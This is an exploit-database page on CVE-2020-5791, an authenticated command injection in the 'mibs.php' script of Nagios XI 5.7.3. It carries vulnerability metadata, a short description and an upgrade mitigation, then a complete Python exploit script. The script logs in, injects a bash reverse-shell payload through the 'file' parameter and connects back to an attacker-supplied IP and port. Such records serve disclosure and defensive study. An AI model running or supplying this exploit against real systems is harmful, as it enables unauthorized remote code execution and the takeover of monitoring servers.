Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)

vendor:

Nagios XI

by:

Matthew Aberegg

7.2

CVSS

HIGH

Remote Command Injection

CWE

Product Name: Nagios XI

Affected Version From: Nagios XI 5.7.3

Affected Version To: Nagios XI 5.7.3

Patch Exists: YES

Related CWE: CVE-2020-5791

CPE: a:nagios:nagios_xi

Metasploit: https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce/

Other Scripts: N/A

Platforms Tested: Ubuntu 20.04

2020

Nagios XI 5.7.3 – ‘mibs.php’ Remote Command Injection (Authenticated)

A remote command injection vulnerability exists in Nagios XI 5.7.3. An authenticated attacker can exploit this vulnerability to execute arbitrary commands on the underlying operating system. This vulnerability is due to insufficient sanitization of user-supplied input in the 'mibs.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability could result in arbitrary code execution on the underlying operating system.

Mitigation:

Upgrade to Nagios XI 5.7.4 or later.

Source

Exploit-DB raw data:

# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
# Date: 10-27-2020
# Vulnerability Discovery: Chris Lyne
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-5791

#!/usr/bin/python3

import re
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Credit: Chris Lyne for vulnerability discovery and original PoC

if len(sys.argv) != 6:
    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/nagiosxi/login.php"
payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()
    login_page = s.get(login_url)
    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
    
    res = s.post(
        login_url,
        data={
            'nsp': nsp,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': '/nagiosxi/index.php?',
            'username': username,
            'password': password,
            'loginButton': ''
        },
        verify=False,
        allow_redirects=True
    )
    
    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
    res = s.get(injection_url)
    
    if res.status_code != 200:
            print("[~] Failed to connect")
    
if __name__ == '__main__':
    exploit()